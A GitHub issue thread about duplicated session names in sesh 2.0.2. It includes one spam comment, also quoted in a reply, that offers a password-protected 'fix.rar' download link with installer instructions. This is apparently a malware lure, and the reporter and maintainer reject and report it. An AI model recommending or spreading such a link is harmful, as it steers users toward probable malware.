### ISSUE TITLE
Double session names after 2.0

### ISSUE THREAD

**Issue by karamanliev** [joshmedeski/sesh#151]
### What happened?

After updating to 2.0.2, when opening a session its name gets cloned - once for the opened session, which is correct, but it stays also as a inactive session:

![image](https://github.com/user-attachments/assets/c6b012da-0971-4b62-8a03-14727e644302)

![image](https://github.com/user-attachments/assets/bb765909-16a1-4f94-8317-b9bcea984352)

On my laptop I'm still on 1.2.0 and the behavior is not the same.

![image](https://github.com/user-attachments/assets/dfd42728-4585-46ad-9f71-8e0bf215ecfd)

### Version

2.0.2

### Relevant log output

There are no error messages.

### Reviewed

- [X] Reviewed existing issues and made sure this bug has not already been submitted.
- [X] I have read the documentation and understand how sesh works before submitting this bug

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by karamanliev** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

No way.

**Comment by joshmedeski** [comment]
Good call @karamanliev! I reported them.

**Comment by karamanliev** [comment]
Gotcha, I understand the use case, but an opt-in/out would be awesome.

Thanks for the great software!

**Comment by joshmedeski** [comment]
Created #156 for this to be done.
